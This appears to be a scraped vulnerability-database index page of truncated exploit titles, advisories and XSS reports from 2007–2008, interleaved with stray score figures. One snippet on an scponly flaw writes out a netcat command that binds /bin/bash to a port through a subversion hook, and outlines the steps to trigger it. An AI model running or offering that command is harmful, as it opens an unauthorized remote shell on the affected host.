ALP-AL00B, ALP-AL00B-RSC, BLA-TL00B, Charlotte-AL00A, Emily-AL00A, Security Vulnerabilities
Unfixed Redirect vulnerability at lamp.lucepedia.com
Security researcher holisticinfosec, has submitted on 29/06/2008 a Redirect vulnerability affecting lamp.lucepedia.com, which at the time of submission ranked 416584 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 07/11/2008. It is currently...
AI Score
7.1AI Score
7.1AI Score
MDaemon <= 9.6.5 Multiple Remote Buffer Overflow Exploit PoC
Exploit for unknown platform in category dos /...
7AI Score
Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows (PoC)
Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows...
0.3AI Score
7.4AI Score
EPSS
cbrPager是用C编写的cbr和cbz(连环画文档)文件查看器。 cbrpager在使用system()函数调用内部解压工具unrar和unzip之前没有正确地过滤图形文档的文件名,如果用户受骗打开了带有特制文件名的.zip或.rar文档的话就可能导致以当前用户的权限执行任意指令。 John Coppens cbrPager < 0.9.17 John Coppens 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
7.1AI Score
Smeego CMS Local File Include Exploit by 0in from Dark-Coders Programming & Security Group >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<< -------------------------------------------------------- Contact: 0in(dot)email[at]gmail(dot...
AI Score
-0.4AI Score
7.1AI Score
Smeego 1.0 (Cookie lang) Local File Inclusion Exploit
Exploit for unknown platform in category web...
7.1AI Score
AI Score
7.4AI Score
EPSS
7.4AI Score
EPSS
7.4AI Score
EPSS
0.4AI Score
Zen Cart 2008 - index.php?keyword Cross-Site Scripting
Zen Cart 2008 - index.php?keyword Cross-Site...
0.1AI Score
-0.4AI Score
Cacti 0.8.7a Multiple Vulnerabilities
Cacti 0.8.7a Multiple Vulnerabilities Name Multiple Vulnerabilities in Cacti Systems Affected Cacti 0.8.7a and possibly earlier versions Severity High Impact (CVSSv2) High (9/10, vector: AV:N/AC:L/Au:N/C:C/I:P/A:P) Vendor http://www.cacti.net/ ...
AI Score
Cacti 0.8.7 - graph_view.php?graph_list SQL Injection
Cacti 0.8.7 - graph_view.php?graph_list SQL...
AI Score
0.7AI Score
7.4AI Score
EPSS
Yahoo! JukeBox MediaGrid ActiveX mediagrid.dll AddBitmap() BOF Exploit
No description provided by...
7.1AI Score
0.1AI Score
Yahoo! JukeBox MediaGrid ActiveX mediagrid.dll AddBitmap() BOF Exploit
Exploit for unknown platform in category remote...
7.1AI Score
7.4AI Score
EPSS
Yahoo! JukeBox MediaGrid - AddBitmap() ActiveX Buffer Overflow
Yahoo! JukeBox MediaGrid - AddBitmap() ActiveX Buffer...
1.1AI Score
-0.2AI Score
Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
No description provided by...
7.1AI Score
Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
Exploit for unknown platform in category remote...
7.1AI Score
Macrovision FlexNet - isusweb.dll DownloadAndExecute Method
Macrovision FlexNet - isusweb.dll DownloadAndExecute...
0.9AI Score
7.4AI Score
EPSS
scponly是一款可替代shell系统,可提供帐户在不需要shell访问的情况下进行scp和sftp操作。 scponly存在设计错误,本地攻击者可以利用漏洞绕过安全限制,执行任意命令。 通过本地建立一个使用包含( nc -l -p 1042 -e /bin/bash) &命令的/tmp/blubb/hooks/post-commit的/tmp/blubb subversion库,使用scp -r /tmp/blubb/ user@host:拷贝这个库。然后远程检查库:ssh user@host /usr/bin/svn co file:///home/user/blubb...
7.1AI Score
7.4AI Score
EPSS
Thomson SpeedTouch 716 - URL Cross-Site Scripting
Thomson SpeedTouch 716 - URL Cross-Site...
-0.9AI Score
SEC Consult SA-20071101-0 :: Multiple Vulnerabilities in SonicWALL SSL-VPN Client
SEC Consult Security Advisory < 20071101-0 > title: Multiple vulnerabilities in SonicWALL SSL-VPN Client * Deletion of arbitrary files on the client * Arbitrary code execution thru various buffer overflows program:...
0.5AI Score
...
7.4AI Score
EPSS
AI Score
SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File...
0.3AI Score
Analysis of Ronin article system V2. 3-vulnerability warning-the black bar safety net
| Author: ice of origin Description: articles have been published in hackers manual 0 7 year 1 1 period, reproduced please specify the source of! Own just to learn ASP, Hey, no one taught, really cool! It does not, see for yourself a few books, and non-security on each issue analysis of ASP...
-0.6AI Score
-0.4AI Score
PHP as a server side scripting language, like writing a simple, or a complex dynamic web page such a task, it is fully able to do the job. But the thing is not always the case, sometimes in order to achieve a certain function, it must be by means of theoperating systemof the external program, or...
AI Score
Unfixed XSS vulnerability at www.marthastewart.com
Security researcher Johnjuan728, has submitted on 21/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.marthastewart.com, which at the time of submission ranked 8852 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 24/09/2007. It...
-0.1AI Score
Calyptix Security Advisory CX-2007-05 - eSoft InstaGate EX2 Cross-Site Request Forgery Attack
Calyptix Security Advisory CX-2007-05 eSoft InstaGate EX2 Cross-Site Request Forgery Attack Date: 07/11/2007 http://www.calyptix.com/ http://labs.calyptix.com/CX-2007-05.php http://labs.calyptix.com/CX-2007-05.txt [ Overview ] Multiple versions of eSoft's InstaGate EX2 UTM device are vulnerable to....
-0.2AI Score
Calyptix Security Advisory CX-2007-05 eSoft InstaGate EX2 Cross-Site Request Forgery Attack Date: 07/11/2007 http://www.calyptix.com/ http://labs.calyptix.com/CX-2007-05.php http://labs.calyptix.com/CX-2007-05.txt [ Overview ] Multiple versions of eSoft's InstaGate EX2 UTM device are vulnerable to....
-0.1AI Score
Calyptix Security Advisory CX-2007-04 Cross-Site Request Forgery Attack Against Check Point Safe@Office Device Date: 06/26/2007 http://www.calyptix.com/ http://labs.calyptix.com/CX-2007-04.php http://labs.calyptix.com/CX-2007-04.txt [ Overview ] Multiple versions of Check Point's Safe@Office UTM...
-0.2AI Score
GD Graphics Library 2.0.34 - libgd gdImageCreateXbm Function Unspecified Denial of Service
GD Graphics Library 2.0.34 - libgd gdImageCreateXbm Function Unspecified Denial of...
0.7AI Score
...
7.4AI Score
EPSS
Unfixed XSS vulnerability at www.visitcharlotte.com
Security researcher MaXWeL, has submitted on 27/05/2007 a cross-site-scripting (XSS) vulnerability affecting www.visitcharlotte.com, which at the time of submission ranked 362747 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 30/05/2007. It is.....
-0.1AI Score
See online article, turn it down collection. PHP as a server side scripting language, like writing a simple, or a complex dynamic web page such a task, it is fully able to do the job. But the thing is not always the case, sometimes in order to achieve a certain function, it must be by means of...
AI Score